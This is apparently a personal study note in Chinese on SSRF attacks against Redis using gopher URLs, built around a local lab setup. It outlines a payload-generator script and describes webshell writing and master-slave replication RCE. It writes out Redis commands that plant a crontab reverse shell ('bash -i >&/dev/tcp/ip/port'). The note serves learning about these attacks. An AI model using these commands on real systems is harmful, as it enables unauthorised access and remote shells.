ssrf攻击redis学习笔记
在Ubuntu虚拟机上搭建redis服务
$sudo #获取root权限
apt-get install redis-server #安装redis服务
vim /etc/redis/redis.conf #查看配置文件(默认6379端口,无密码)
/bin/redis-server /etc/redis/redis.conf #启动redis服务
netstat -antpl|grep redis #验证redis服务已启动
前置知识之Redis通信方式
redis是一个key-value式的非关系型数据库,redis服务器与客户端通过 RESP(REdis Serialization Protocol)协议通信。
这里直接从大佬的blog截出不同类型数据间的处理方式
nc 127.0.0.1 6379 #在虚拟机中nc连接redis
可见这里name对应的值a为长度为1的bulk strings。
前置知识之gopher协议
可以使用gopher协议携带数据来访问目标,格式:gopher://<host>:<port>/<path>_后接数据流
攻击方法
知道了Redis的通信方式,就可以构造自己想执行的命令并将其转化为特定的格式,利用gopher协议携带该数据访问redis并执行相应命令。
写一个生成payload的python脚本
from urllib.parse import quote as urlencode
def gopher():
#stream里是构造的数据
stream=f'''
'''.replace("\n","\r\n")
g="gopher://127.0.0.1:6379/_"+urlencode(stream)
return g
print(urlencode(gopher()))
进行测试一下:首先在本地redis上执行命令set password 123456来设置password对应的值为123456,攻击目的即通过test.php来未授权访问redis并拿到password对应的值。
所需执行的命令是get password=>根据通信方式构造数据并用python脚本生成payload,此时已经可以用curl命令执行得到回显
在攻击有密码的redis过程中需要在前面加一条命令‘auth xxxx’即可
已知web目录绝对路径写webshell
我的理解是用redis存备份文件的方法控制文件名和部分内容,写入特定目录下
这里可以用到一个生成payload的工具redis-over-gopher,将所要执行的命令放在redis.cmd里,运行python脚本即可。
这里中间有一个细节是如果按默认配置的话save命令会报一个error出来,解决方法是nc连上redis执行config set stop-writes-on-bgsave-error no
打一下看看效果
可见写入成功。
写crontab反弹shell
仅在centos中能成功(因为存在一些脏数据),本地环境是ubuntu,就仅仅简单记录一下攻击方法
set y "\\n\\n\\n\\n* * * * * root bash -i >&/dev/tcp/ip/port >&1\\n\\n\\n\\n"
config set dir /etc/
config set dbfilename crontab
save
quit
将以上代码放入redis.cmd,其他步骤同上。
主从复制rce
我的理解是模拟主服务器加载恶意的.so文件,让目标作为从机同步,从而完成攻击。
这里就直接利用工具redis-rce(-L里的参数不能直接填127.0.0.1)
成功实现rce,其中exp.so是贴的工具redis-rogue-server里的。